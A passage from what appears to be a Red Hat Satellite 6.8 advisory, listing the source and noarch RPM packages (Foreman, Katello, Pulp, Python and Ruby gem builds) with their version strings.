pm\npython-attrs-19.3.0-3.el7ar.src.rpm\npython-billiard-3.5.0.3-3.el7sat.src.rpm\npython-blinker-1.3-2.el7sat.src.rpm\npython-celery-4.0.2-9.el7sat.src.rpm\npython-chardet-3.0.4-10.el7ar.src.rpm\npython-click-6.7-9.el7sat.src.rpm\npython-crane-3.3.1-9.el7sat.src.rpm\npython-daemon-2.1.2-7.el7at.src.rpm\npython-dateutil-2.8.1-2.el7ar.src.rpm\npython-django-1.11.29-1.el7sat.src.rpm\npython-flask-0.12.2-4.el7sat.src.rpm\npython-gnupg-0.3.7-1.el7ui.src.rpm\npython-idna-2.4-2.el7ar.src.rpm\npython-idna-ssl-1.1.0-2.el7ar.src.rpm\npython-isodate-0.5.4-12.el7sat.src.rpm\npython-itsdangerous-0.24-15.el7sat.src.rpm\npython-jinja2-2.10-10.el7sat.src.rpm\npython-jmespath-0.9.0-6.el7_7.src.rpm\npython-kid-0.9.6-11.el7sat.src.rpm\npython-kombu-4.0.2-13.el7sat.src.rpm\npython-lockfile-0.11.0-10.el7ar.src.rpm\npython-markupsafe-0.23-21.el7sat.src.rpm\npython-mongoengine-0.10.5-2.el7sat.src.rpm\npython-multidict-4.7.4-2.el7ar.src.rpm\npython-nectar-1.6.2-1.el7sat.src.rpm\npython-oauth2-1.5.211-8.el7sat.src.rpm\npython-okaara-1.0.37-2.el7sat.src.rpm\npython-pexpect-4.6-1.el7at.src.rpm\npython-prometheus-client-0.7.1-2.el7ar.src.rpm\npython-psutil-5.0.1-3.el7sat.src.rpm\npython-ptyprocess-0.5.2-3.el7at.src.rpm\npython-pycurl-7.43.0.2-4.el7sat.src.rpm\npython-pymongo-3.2-2.el7sat.src.rpm\npython-qpid-1.35.0-5.el7.src.rpm\npython-receptor-satellite-1.2.0-1.el7sat.src.rpm\npython-semantic_version-2.2.0-6.el7sat.src.rpm\npython-simplejson-3.2.0-1.el7sat.src.rpm\npython-six-1.11.0-8.el7ar.src.rpm\npython-twisted-16.4.1-12.el7sat.src.rpm\npython-typing-extensions-3.7.4.1-2.el7ar.src.rpm\npython-vine-1.1.3-6.el7sat.src.rpm\npython-werkzeug-0.12.2-5.el7sat.src.rpm\npython-yarl-1.4.2-2.el7ar.src.rpm\npython-zope-interface-4.0.5-4.el7.src.rpm\nqpid-cpp-1.36.0-28.el7amq.src.rpm\nqpid-dispatch-1.5.0-4.el7.src.rpm\nqpid-proton-0.28.0-3.el7.src.rpm\nreceptor-0.6.3-1.el7ar.src.rpm\nredhat-access-insights-puppet-1.0.1-1.el7sat.src.rpm\nrepoview-0.6.6-11.el7sat.src.rpm\nrh-postgresql12-postgresql-evr-0.0.2-1.el7sat.src.rpm\nrhel8-kickstart-setup-0.0.2-1.el7sat.src.rpm\nrubygem-facter-2.4.1-2.el7sat.src.rpm\nrubygem-fast_gettext-1.1.0-4.el7sat.src.rpm\nrubygem-foreman_scap_client-0.4.6-1.el7sat.src.rpm\nrubygem-highline-1.7.8-3.el7sat.src.rpm\nrubygem-newt-0.9.6-3.el7sat.src.rpm\nrubygem-oauth-0.5.4-2.el7sat.src.rpm\nrubygem-passenger-4.0.18-24.el7sat.src.rpm\nrubygem-rack-1.6.12-1.el7sat.src.rpm\nrubygem-rake-0.9.2.2-41.el7sat.src.rpm\nsaslwrapper-0.22-5.el7sat.src.rpm\nsatellite-6.8.0-1.el7sat.src.rpm\nsatellite-installer-6.8.0.11-1.el7sat.src.rpm\ntfm-6.1-1.el7sat.src.rpm\ntfm-rubygem-actioncable-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-actionmailbox-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-actionmailer-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-actionpack-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-actiontext-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-actionview-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-activejob-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-activemodel-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-activerecord-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-activerecord-import-1.0.0-6.el7sat.src.rpm\ntfm-rubygem-activerecord-session_store-1.1.1-4.el7sat.src.rpm\ntfm-rubygem-activestorage-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-activesupport-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-addressable-2.6.0-1.el7sat.src.rpm\ntfm-rubygem-algebrick-0.7.3-6.el7sat.src.rpm\ntfm-rubygem-amazing_print-1.1.0-1.el7sat.src.rpm\ntfm-rubygem-ancestry-3.0.7-1.el7sat.src.rpm\ntfm-rubygem-anemone-0.7.2-22.el7sat.src.rpm\ntfm-rubygem-angular-rails-templates-1.1.0-1.el7sat.src.rpm\ntfm-rubygem-ansi-1.5.0-2.el7sat.src.rpm\ntfm-rubygem-apipie-bindings-0.3.0-1.el7sat.src.rpm\ntfm-rubygem-apipie-dsl-2.2.2-2.el7sat.src.rpm\ntfm-rubygem-apipie-params-0.0.5-5.el7sat.src.rpm\ntfm-rubygem-apipie-rails-0.5.17-3.el7sat.src.rpm\ntfm-rubygem-audited-4.9.0-3.el7sat.src.rpm\ntfm-rubygem-azure_mgmt_compute-0.18.7-1.el7sat.src.rpm\ntfm-rubygem-azure_mgmt_network-0.19.0-1.el7sat.src.rpm\ntfm-rubygem-azure_mgmt_resources-0.17.6-1.el7sat.src.rpm\ntfm-rubygem-azure_mgmt_storage-0.17.10-1.el7sat.src.rpm\ntfm-rubygem-azure_mgmt_subscriptions-0.18.2-1.el7sat.src.rpm\ntfm-rubygem-bcrypt-3.1.12-1.el7sat.src.rpm\ntfm-rubygem-builder-3.2.4-1.el7sat.src.rpm\ntfm-rubygem-bundler_ext-0.4.1-4.el7sat.src.rpm\ntfm-rubygem-clamp-1.1.2-5.el7sat.src.rpm\ntfm-rubygem-coffee-rails-5.0.0-1.el7sat.src.rpm\ntfm-rubygem-coffee-script-2.4.1-4.el7sat.src.rpm\ntfm-rubygem-coffee-script-source-1.12.2-4.el7sat.src.rpm\ntfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.src.rpm\ntfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.src.rpm\ntfm-rubygem-connection_pool-2.2.2-2.el7sat.src.rpm\ntfm-rubygem-crass-1.0.6-1.el7sat.src.rpm\ntfm-rubygem-css_parser-1.4.7-3.el7sat.src.rpm\ntfm-rubygem-daemons-1.2.3-7.el7sat.src.rpm\ntfm-rubygem-deacon-1.0.0-4.el7sat.src.rpm\ntfm-rubygem-declarative-0.0.10-1.el7sat.src.rpm\ntfm-rubygem-declarative-option-0.1.0-1.el7sat.src.rpm\ntfm-rubygem-deep_cloneable-3.0.0-3.el7sat.src.rpm\ntfm-rubygem-deface-1.5.3-2.el7sat.src.rpm\ntfm-rubygem-diffy-3.0.1-6.el7sat.src.rpm\ntfm-rubygem-domain_name-0.5.20160310-4.el7sat.src.rpm\ntfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-erubi-1.9.0-1.el7sat.src.rpm\ntfm-rubygem-excon-0.58.0-3.el7sat.src.rpm\ntfm-rubygem-execjs-2.7.0-4.el7sat.src.rpm\ntfm-rubygem-facter-2.4.0-6.el7sat.src.rpm\ntfm-rubygem-faraday-0.15.4-1.el7sat.src.rpm\ntfm-rubygem-faraday-cookie_jar-0.0.6-1.el7sat.src.rpm\ntfm-rubygem-faraday_middleware-0.13.1-2.el7sat.src.rpm\ntfm-rubygem-fast_gettext-1.4.1-3.el7sat.src.rpm\ntfm-rubygem-ffi-1.12.2-1.el7sat.src.rpm\ntfm-rubygem-fog-aws-3.6.5-1.el7sat.src.rpm\ntfm-rubygem-fog-core-2.1.0-3.el7sat.src.rpm\ntfm-rubygem-fog-google-1.8.2-1.el7sat.src.rpm\ntfm-rubygem-fog-json-1.2.0-3.el7sat.src.rpm\ntfm-rubygem-fog-kubevirt-1.3.3-1.el7sat.src.rpm\ntfm-rubygem-fog-libvirt-0.7.0-1.el7sat.src.rpm\ntfm-rubygem-fog-openstack-1.0.8-2.el7sat.src.rpm\ntfm-rubygem-fog-ovirt-1.2.5-1.el7sat.src.rpm\ntfm-rubygem-fog-vsphere-3.3.1-1.el7sat.src.rpm\ntfm-rubygem-fog-xml-0.1.2-8.el7sat.src.rpm\ntfm-rubygem-foreman-tasks-2.0.2-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.src.rpm\ntfm-rubygem-foreman_ansible-5.1.3-1.el7sat.src.rpm\ntfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.src.rpm\ntfm-rubygem-foreman_azure_rm-2.1.2-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-foreman_bootdisk-17.0.2-2.fm2_1.el7sat.src.rpm\ntfm-rubygem-foreman_discovery-16.1.2-1.el7sat.src.rpm\ntfm-rubygem-foreman_hooks-0.3.16-2.el7sat.src.rpm\ntfm-rubygem-foreman_kubevirt-0.1.7-1.el7sat.src.rpm\ntfm-rubygem-foreman_leapp-0.1.6-1.el7sat.src.rpm\ntfm-rubygem-foreman_openscap-4.0.3-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-foreman_remote_execution-3.3.7-1.el7sat.src.rpm\ntfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.src.rpm\ntfm-rubygem-foreman_rh_cloud-2.0.12-1.el7sat.src.rpm\ntfm-rubygem-foreman_templates-9.0.1-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-foreman_theme_satellite-6.0.1.7-1.el7sat.src.rpm\ntfm-rubygem-foreman_virt_who_configure-0.5.2-1.el7sat.src.rpm\ntfm-rubygem-formatador-0.2.1-11.el7sat.src.rpm\ntfm-rubygem-friendly_id-5.3.0-1.el7sat.src.rpm\ntfm-rubygem-fx-0.5.0-1.el7sat.src.rpm\ntfm-rubygem-get_process_mem-0.2.1-3.el7sat.src.rpm\ntfm-rubygem-gettext-3.1.4-10.el7sat.src.rpm\ntfm-rubygem-gettext_i18n_rails-1.8.0-1.el7sat.src.rpm\ntfm-rubygem-git-1.5.0-1.el7sat.src.rpm\ntfm-rubygem-gitlab-sidekiq-fetcher-0.5.2-2.el7sat.src.rpm\ntfm-rubygem-globalid-0.4.2-1.el7sat.src.rpm\ntfm-rubygem-google-api-client-0.23.9-3.el7sat.src.rpm\ntfm-rubygem-googleauth-0.6.7-3.el7sat.src.rpm\ntfm-rubygem-graphql-1.8.14-1.el7sat.src.rpm\ntfm-rubygem-graphql-batch-0.3.10-1.el7sat.src.rpm\ntfm-rubygem-gssapi-1.2.0-6.el7sat.src.rpm\ntfm-rubygem-hammer_cli-2.1.2-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman-2.1.2.1-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_admin-0.0.9-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_ansible-0.3.2-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_azure_rm-0.2.0-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_bootdisk-0.3.0-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_discovery-1.0.2-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_docker-0.0.6.4-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_kubevirt-0.1.4-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_leapp-0.1.0-2.fm2_1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_openscap-0.1.11-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_remote_execution-0.1.2-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_tasks-0.0.14-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_templates-0.2.0-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_virt_who_configure-0.0.6-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_katello-0.22.2.2-1.el7sat.src.rpm\ntfm-rubygem-hashie-3.6.0-1.el7sat.src.rpm\ntfm-rubygem-highline-1.7.8-4.el7sat.src.rpm\ntfm-rubygem-http-3.3.0-1.el7sat.src.rpm\ntfm-rubygem-http-cookie-1.0.2-5.el7sat.src.rpm\ntfm-rubygem-http-form_data-2.1.1-1.el7sat.src.rpm\ntfm-rubygem-http_parser.rb-0.6.0-1.el7sat.src.rpm\ntfm-rubygem-httpclient-2.8.3-1.el7sat.src.rpm\ntfm-rubygem-i18n-1.8.2-1.el7sat.src.rpm\ntfm-rubygem-infoblox-3.0.0-3.el7sat.src.rpm\ntfm-rubygem-ipaddress-0.8.0-11.el7sat.src.rpm\ntfm-rubygem-jgrep-1.3.3-12.el7sat.src.rpm\ntfm-rubygem-journald-logger-2.0.4-2.el7sat.src.rpm\ntfm-rubygem-journald-native-1.0.11-2.el7sat.src.rpm\ntfm-rubygem-jwt-2.2.1-1.el7sat.src.rpm\ntfm-rubygem-kafo-4.1.0-3.el7sat.src.rpm\ntfm-rubygem-kafo_parsers-1.1.0-3.el7sat.src.rpm\ntfm-rubygem-kafo_wizards-0.0.1-4.el7sat.src.rpm\ntfm-rubygem-katello-3.16.0.11-1.el7sat.src.rpm\ntfm-rubygem-kubeclient-4.3.0-1.el7sat.src.rpm\ntfm-rubygem-ldap_fluff-0.4.7-5.el7sat.src.rpm\ntfm-rubygem-little-plugger-1.1.4-1.el7sat.src.rpm\ntfm-rubygem-locale-2.0.9-13.el7sat.src.rpm\ntfm-rubygem-logging-2.2.2-6.el7sat.src.rpm\ntfm-rubygem-logging-journald-2.0.0-2.el7sat.src.rpm\ntfm-rubygem-loofah-2.4.0-1.el7sat.src.rpm\ntfm-rubygem-mail-2.7.1-1.el7sat.src.rpm\ntfm-rubygem-marcel-0.3.3-1.el7sat.src.rpm\ntfm-rubygem-memoist-0.16.0-1.el7sat.src.rpm\ntfm-rubygem-method_source-0.9.2-2.el7sat.src.rpm\ntfm-rubygem-mime-types-3.2.2-4.el7sat.src.rpm\ntfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.src.rpm\ntfm-rubygem-mimemagic-0.3.5-1.el7sat.src.rpm\ntfm-rubygem-mini_mime-1.0.2-1.el7sat.src.rpm\ntfm-rubygem-mini_portile2-2.4.0-1.el7sat.src.rpm\ntfm-rubygem-ms_rest-0.7.4-2.el7sat.src.rpm\ntfm-rubygem-ms_rest_azure-0.11.1-2.el7sat.src.rpm\ntfm-rubygem-multi_json-1.14.1-1.el7sat.src.rpm\ntfm-rubygem-multipart-post-2.0.0-1.el7sat.src.rpm\ntfm-rubygem-mustermann-1.0.2-4.el7sat.src.rpm\ntfm-rubygem-net-ldap-0.16.1-1.el7sat.src.rpm\ntfm-rubygem-net-ping-2.0.1-3.el7sat.src.rpm\ntfm-rubygem-net-scp-1.2.1-3.el7sat.src.rpm\ntfm-rubygem-net-ssh-4.2.0-1.el7sat.src.rpm\ntfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.src.rpm\ntfm-rubygem-netrc-0.11.0-3.el7sat.src.rpm\ntfm-rubygem-nio4r-2.5.2-2.el7sat.src.rpm\ntfm-rubygem-nokogiri-1.10.9-1.el7sat.src.rpm\ntfm-rubygem-oauth-0.5.4-3.el7sat.src.rpm\ntfm-rubygem-openscap-0.4.9-3.el7sat.src.rpm\ntfm-rubygem-optimist-3.0.0-1.el7sat.src.rpm\ntfm-rubygem-os-1.0.0-1.el7sat.src.rpm\ntfm-rubygem-ovirt-engine-sdk-4.2.3-3.el7sat.src.rpm\ntfm-rubygem-ovirt_provision_plugin-2.0.3-1.el7sat.src.rpm\ntfm-rubygem-parse-cron-0.1.4-4.el7sat.src.rpm\ntfm-rubygem-passenger-4.0.18-26.el7sat.src.rpm\ntfm-rubygem-pg-1.1.4-2.el7sat.src.rpm\ntfm-rubygem-polyglot-0.3.5-3.el7sat.src.rpm\ntfm-rubygem-powerbar-2.0.1-2.el7sat.src.rpm\ntfm-rubygem-prometheus-client-1.0.0-1.el7sat.src.rpm\ntfm-rubygem-promise.rb-0.7.4-1.el7sat.src.rpm\ntfm-rubygem-public_suffix-3.0.3-1.el7sat.src.rpm\ntfm-rubygem-pulp_2to3_migration_client-0.2.0-0.1.b6.el7sat.src.rpm\ntfm-rubygem-pulp_ansible_client-0.2.0b13.dev01588546902-1.el7sat.src.rpm\ntfm-rubygem-pulp_certguard_client-0.1.0rc5-1.el7sat.src.rpm\ntfm-rubygem-pulp_container_client-1.4.1-1.el7sat.src.rpm\ntfm-rubygem-pulp_file_client-1.0.1-1.el7sat.src.rpm\ntfm-rubygem-pulp_rpm_client-3.5.0-1.el7sat.src.rpm\ntfm-rubygem-pulpcore_client-3.4.1-1.el7sat.src.rpm\ntfm-rubygem-puma-4.3.3-4.el7sat.src.rpm\ntfm-rubygem-puma-plugin-systemd-0.1.5-1.el7sat.src.rpm\ntfm-rubygem-quantile-0.2.0-3.el7sat.src.rpm\ntfm-rubygem-rabl-0.14.3-1.el7sat.src.rpm\ntfm-rubygem-rack-2.2.3-1.el7sat.src.rpm\ntfm-rubygem-rack-cors-1.0.2-1.el7sat.src.rpm\ntfm-rubygem-rack-jsonp-1.3.1-9.el7sat.src.rpm\ntfm-rubygem-rack-protection-2.0.3-4.el7sat.src.rpm\ntfm-rubygem-rack-test-1.1.0-4.el7sat.src.rpm\ntfm-rubygem-rails-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-rails-dom-testing-2.0.3-6.el7sat.src.rpm\ntfm-rubygem-rails-html-sanitizer-1.3.0-1.el7sat.src.rpm\ntfm-rubygem-rails-i18n-6.0.0-2.el7sat.src.rpm\ntfm-rubygem-railties-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-rainbow-2.2.1-5.el7sat.src.rpm\ntfm-rubygem-rb-inotify-0.9.7-5.el7sat.src.rpm\ntfm-rubygem-rbovirt-0.1.7-4.el7sat.src.rpm\ntfm-rubygem-rbvmomi-2.2.0-3.el7sat.src.rpm\ntfm-rubygem-record_tag_helper-1.0.1-3.el7sat.src.rpm\ntfm-rubygem-recursive-open-struct-1.1.0-1.el7sat.src.rpm\ntfm-rubygem-redhat_access-2.2.18-1.el7sat.src.rpm\ntfm-rubygem-redhat_access_lib-1.1.5-1.el7sat.src.rpm\ntfm-rubygem-redis-4.1.2-2.el7sat.src.rpm\ntfm-rubygem-representable-3.0.4-1.el7sat.src.rpm\ntfm-rubygem-responders-3.0.0-3.el7sat.src.rpm\ntfm-rubygem-rest-client-2.0.2-3.el7sat.src.rpm\ntfm-rubygem-retriable-3.1.2-1.el7sat.src.rpm\ntfm-rubygem-rkerberos-0.1.5-18.el7sat.src.rpm\ntfm-rubygem-roadie-3.4.0-3.el7sat.src.rpm\ntfm-rubygem-roadie-rails-2.1.1-2.el7sat.src.rpm\ntfm-rubygem-robotex-1.0.0-21.el7sat.src.rpm\ntfm-rubygem-rsec-0.4.3-4.el7sat.src.rpm\ntfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.src.rpm\ntfm-rubygem-ruby2ruby-2.4.2-3.el7sat.src.rpm\ntfm-rubygem-ruby_parser-3.10.1-2.el7sat.src.rpm\ntfm-rubygem-rubyipmi-0.10.0-6.el7sat.src.rpm\ntfm-rubygem-runcible-2.13.0-2.el7sat.src.rpm\ntfm-rubygem-safemode-1.3.5-2.el7sat.src.rpm\ntfm-rubygem-scoped_search-4.1.9-1.el7sat.src.rpm\ntfm-rubygem-secure_headers-6.3.0-2.el7sat.src.rpm\ntfm-rubygem-sequel-5.7.1-2.el7sat.src.rpm\ntfm-rubygem-sexp_processor-4.10.0-5.el7sat.src.rpm\ntfm-rubygem-sidekiq-5.2.7-3.el7sat.src.rpm\ntfm-rubygem-signet-0.11.0-3.el7sat.src.rpm\ntfm-rubygem-sinatra-2.0.3-4.el7sat.src.rpm\ntfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.src.rpm\ntfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.src.rpm\ntfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.src.rpm\ntfm-rubygem-sprockets-3.7.2-6.el7sat.src.rpm\ntfm-rubygem-sprockets-rails-3.2.1-6.el7sat.src.rpm\ntfm-rubygem-sqlite3-1.3.13-5.el7sat.src.rpm\ntfm-rubygem-sshkey-1.9.0-3.el7sat.src.rpm\ntfm-rubygem-statsd-instrument-2.1.4-2.el7sat.src.rpm\ntfm-rubygem-stomp-1.4.9-1.el7sat.src.rpm\ntfm-rubygem-text-1.3.0-7.el7sat.src.rpm\ntfm-rubygem-thor-1.0.1-2.el7sat.src.rpm\ntfm-rubygem-thread_safe-0.3.6-5.el7sat.src.rpm\ntfm-rubygem-tilt-2.0.8-4.el7sat.src.rpm\ntfm-rubygem-timeliness-0.3.10-1.el7sat.src.rpm\ntfm-rubygem-tzinfo-1.2.6-1.el7sat.src.rpm\ntfm-rubygem-uber-0.1.0-1.el7sat.src.rpm\ntfm-rubygem-unf-0.1.3-7.el7sat.src.rpm\ntfm-rubygem-unf_ext-0.0.7.2-1.el7sat.src.rpm\ntfm-rubygem-unicode-0.4.4.4-1.el7sat.src.rpm\ntfm-rubygem-unicode-display_width-1.0.5-5.el7sat.src.rpm\ntfm-rubygem-validates_lengths_from_database-0.5.0-7.el7sat.src.rpm\ntfm-rubygem-webpack-rails-0.9.8-6.el7sat.src.rpm\ntfm-rubygem-websocket-driver-0.7.1-1.el7sat.src.rpm\ntfm-rubygem-websocket-extensions-0.1.5-1.el7sat.src.rpm\ntfm-rubygem-will_paginate-3.1.7-3.el7sat.src.rpm\ntfm-rubygem-x-editable-rails-1.5.5-5.el7sat.src.rpm\ntfm-rubygem-xmlrpc-0.3.0-2.el7sat.src.rpm\ntfm-rubygem-zeitwerk-2.2.2-1.el7sat.src.rpm\n\nnoarch:\nansible-collection-redhat-satellite-1.3.0-1.el7sat.noarch.rpm\nansible-runner-1.4.6-1.el7ar.noarch.rpm\nansiblerole-foreman_scap_client-0.0.5-1.el7sat.noarch.rpm\nansiblerole-insights-client-1.7.1-1.el7sat.noarch.rpm\nansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.noarch.rpm\ncandlepin-3.1.21-1.el7sat.noarch.rpm\ncandlepin-selinux-3.1.21-1.el7sat.noarch.rpm\ncrane-selinux-3.4.0-1.el7sat.noarch.rpm\nforeman-2.1.2.19-1.el7sat.noarch.rpm\nforeman-bootloaders-redhat-202005201200-1.el7sat.noarch.rpm\nforeman-bootloaders-redhat-tftpboot-202005201200-1.el7sat.noarch.rpm\nforeman-cli-2.1.2.19-1.el7sat.noarch.rpm\nforeman-debug-2.1.2.19-1.el7sat.noarch.rpm\nforeman-discovery-image-3.6.7-1.el7sat.noarch.rpm\nforeman-dynflow-sidekiq-2.1.2.19-1.el7sat.noarch.rpm\nforeman-ec2-2.1.2.19-1.el7sat.noarch.rpm\nforeman-gce-2.1.2.19-1.el7sat.noarch.rpm\nforeman-installer-2.1.2.8-1.el7sat.noarch.rpm\nforeman-installer-katello-2.1.2.8-1.el7sat.noarch.rpm\nforeman-journald-2.1.2.19-1.el7sat.noarch.rpm\nforeman-libvirt-2.1.2.19-1.el7sat.noarch.rpm\nforeman-openstack-2.1.2.19-1.el7sat.noarch.rpm\nforeman-ovirt-2.1.2.19-1.el7sat.noarch.rpm\nforeman-postgresql-2.1.2.19-1.el7sat.noarch.rpm\nforeman-proxy-2.1.2-2.el7sat.noarch.rpm\nforeman-proxy-content-3.16.0-1.el7sat.noarch.rpm\nforeman-proxy-journald-2.1.2-2.el7sat.noarch.rpm\nforeman-selinux-2.1.2.3-1.el7sat.noarch.rpm\nforeman-service-2.1.2.19-1.el7sat.noarch.rpm\nforeman-telemetry-2.1.2.19-1.el7sat.noarch.rpm\nforeman-vmware-2.1.2.19-1.el7sat.noarch.rpm\nkatello-3.16.0-1.el7sat.noarch.rpm\nkatello-certs-tools-2.7.1-1.el7sat.noarch.rpm\nkatello-client-bootstrap-1.7.5-1.el7sat.noarch.rpm\nkatello-common-3.16.0-1.el7sat.noarch.rpm\nkatello-debug-3.16.0-1.el7sat.noarch.rpm\nkatello-selinux-3.4.0-1.el7sat.noarch.rpm\nkeycloak-httpd-client-install-1.2.2-1.el7sat.noarch.rpm\nkobo-0.5.1-1.el7sat.noarch.rpm\npulp-admin-client-2.21.3-1.el7sat.noarch.rpm\npulp-docker-admin-extensions-3.2.7-1.el7sat.noarch.rpm\npulp-docker-plugins-3.2.7-1.el7sat.noarch.rpm\npulp-katello-1.0.3-1.el7sat.noarch.rpm\npulp-maintenance-2.21.3-1.el7sat.noarch.rpm\npulp-ostree-admin-extensions-1.3.1-2.el7sat.noarch.rpm\npulp-ostree-plugins-1.3.1-2.el7sat.noarch.rpm\npulp-puppet-admin-extensions-2.21.3-2.el7sat.noarch.rpm\npulp-puppet-plugins-2.21.3-2.el7sat.noarch.rpm\npulp-puppet-tools-2.21.3-2.el7sat.noarch.rpm\npulp-rpm-admin-extensions-2.21.3-2.el7sat.noarch.rpm\npulp-rpm-plugins-2.21.3-2.el7sat.noarch.rpm\npulp-selinux-2.21.3-1.el7sat.noarch.rpm\npulp-server-2.21.3-1.el7sat.noarch.rpm\npuppet-agent-oauth-0.5.1-3.el7sat.noarch.rpm\npuppet-foreman_scap_client-0.4.0-1.el7sat.noarch.rpm\npuppetlabs-stdlib-4.25.1-2.el7sat.noarch.rpm\npuppetserver-6.13.0-1.el7sat.noarch.rpm\npython-blinker-1.3-2.el7sat.noarch.rpm\npython-gnupg-0.3.7-1.el7ui.noarch.rpm\npython-gofer-2.12.5-7.el7sat.noarch.rpm\npython-gofer-qpid-2.12.5-7.el7sat.noarch.rpm\npython-kid-0.9.6-11.el7sat.noarch.rpm\npython-mongoengine-0.10.5-2.el7sat.noarch.rpm\npython-nectar-1.6.2-1.el7sat.noarch.rpm\npython-oauth2-1.5.211-8.el7sat.noarch.rpm\npython-pulp-bindings-2.21.3-1.el7sat.noarch.rpm\npython-pulp-client-lib-2.21.3-1.el7sat.noarch.rpm\npython-pulp-common-2.21.3-1.el7sat.noarch.rpm\npython-pulp-docker-common-3.2.7-1.el7sat.noarch.rpm\npython-pulp-integrity-2.21.3-2.el7sat.noarch.rpm\npython-pulp-oid_validation-2.21.3-1.el7sat.noarch.rpm\npython-pulp-ostree-common-1.3.1-2.el7sat.noarch.rpm\npython-pulp-puppet-common-2.21.3-2.el7sat.noarch.rpm\npython-pulp-repoauth-2.21.3-1.el7sat.noarch.rpm\npython-pulp-rpm-common-2.21.3-2.el7sat.noarch.rpm\npython-pulp-streamer-2.21.3-1.el7sat.noarch.rpm\npython-qpid-1.35.0-5.el7.noarch.rpm\npython-semantic_version-2.2.0-6.el7sat.noarch.rpm\npython2-amqp-2.2.2-5.el7sat.noarch.rpm\npython2-ansible-runner-1.4.6-1.el7ar.noarch.rpm\npython2-anyjson-0.3.3-11.el7sat.noarch.rpm\npython2-apypie-0.2.2-1.el7sat.noarch.rpm\npython2-celery-4.0.2-9.el7sat.noarch.rpm\npython2-click-6.7-9.el7sat.noarch.rpm\npython2-crane-3.3.1-9.el7sat.noarch.rpm\npython2-daemon-2.1.2-7.el7at.noarch.rpm\npython2-django-1.11.29-1.el7sat.noarch.rpm\npython2-flask-0.12.2-4.el7sat.noarch.rpm\npython2-future-0.16.0-11.el7sat.noarch.rpm\npython2-isodate-0.5.4-12.el7sat.noarch.rpm\npython2-itsdangerous-0.24-15.el7sat.noarch.rpm\npython2-jinja2-2.10-10.el7sat.noarch.rpm\npython2-jmespath-0.9.0-6.el7_7.noarch.rpm\npython2-keycloak-httpd-client-install-1.2.2-1.el7sat.noarch.rpm\npython2-kombu-4.0.2-13.el7sat.noarch.rpm\npython2-lockfile-0.11.0-10.el7ar.noarch.rpm\npython2-okaara-1.0.37-2.el7sat.noarch.rpm\npython2-pexpect-4.6-1.el7at.noarch.rpm\npython2-ptyprocess-0.5.2-3.el7at.noarch.rpm\npython2-vine-1.1.3-6.el7sat.noarch.rpm\npython2-werkzeug-0.12.2-5.el7sat.noarch.rpm\npython3-async-timeout-3.0.1-2.el7ar.noarch.rpm\npython3-attrs-19.3.0-3.el7ar.noarch.rpm\npython3-chardet-3.0.4-10.el7ar.noarch.rpm\npython3-dateutil-2.8.1-2.el7ar.noarch.rpm\npython3-idna-2.4-2.el7ar.noarch.rpm\npython3-idna-ssl-1.1.0-2.el7ar.noarch.rpm\npython3-prometheus-client-0.7.1-2.el7ar.noarch.rpm\npython3-receptor-satellite-1.2.0-1.el7sat.noarch.rpm\npython3-six-1.11.0-8.el7ar.noarch.rpm\npython3-typing-extensions-3.7.4.1-2.el7ar.noarch.rpm\nqpid-dispatch-tools-1.5.0-4.el7.noarch.rpm\nqpid-tools-1.36.0-28.el7amq.noarch.rpm\nreceptor-0.